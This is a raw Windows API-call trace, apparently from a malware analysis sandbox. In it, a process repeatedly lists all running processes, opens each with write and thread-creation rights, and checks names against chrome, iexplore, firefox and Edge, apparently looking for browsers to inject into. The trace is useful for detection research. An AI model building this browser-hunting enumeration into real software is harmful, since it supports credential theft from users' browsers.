	[0244.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.443] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8f8c
	[0244.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.446] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.446] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.447] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8f90
	[0244.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.448] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.449] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.449] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8f94
	[0244.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.452] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0244.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.452] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.455] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0244.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.455] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8f98
	[0244.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.457] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.457] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.458] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.458] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8f9c
	[0244.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.460] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0244.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.461] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.461] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0244.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.461] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8fa0
	[0244.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.463] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.463] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.464] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.464] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.465] CloseHandle (hObject=0x4fd0) returned 1
	[0244.465] Sleep (dwMilliseconds=0x64) 
	[0244.572] GetCurrentProcessId () returned 0x110
	[0244.572] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0244.574] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0244.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0244.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0244.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8fa4
	[0244.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.576] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.577] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.577] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.578] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8fa8
	[0244.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.579] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.579] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.580] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.580] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.580] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0244.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8fac
	[0244.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.581] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0244.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.581] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.582] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0244.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.582] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8fb0
	[0244.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.583] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.584] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.584] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.584] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8fb4
	[0244.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.585] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0244.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.586] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.586] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0244.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.586] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.587] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8fb8
	[0244.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.588] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0244.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.588] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.588] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0244.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.589] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.589] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8fbc
	[0244.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.590] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0244.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.590] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.590] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0244.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.591] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8fc0
	[0244.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.592] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.592] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.592] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.593] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8fc4
	[0244.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.594] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.595] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.595] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.595] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.596] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8fc8
	[0244.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.597] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.597] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.597] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.598] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.598] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8fcc
	[0244.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.599] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.599] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.599] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.600] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.600] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8fd0
	[0244.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.601] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.601] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.602] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.602] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.602] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8fd4
	[0244.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.603] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.604] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.605] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.605] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8fd8
	[0244.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.607] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.607] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.608] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.608] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8fdc
	[0244.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.623] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.624] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.624] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.625] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8fe0
	[0244.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.626] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0244.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0244.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8fe4
	[0244.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.629] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.629] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.629] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.630] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8fe8
	[0244.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
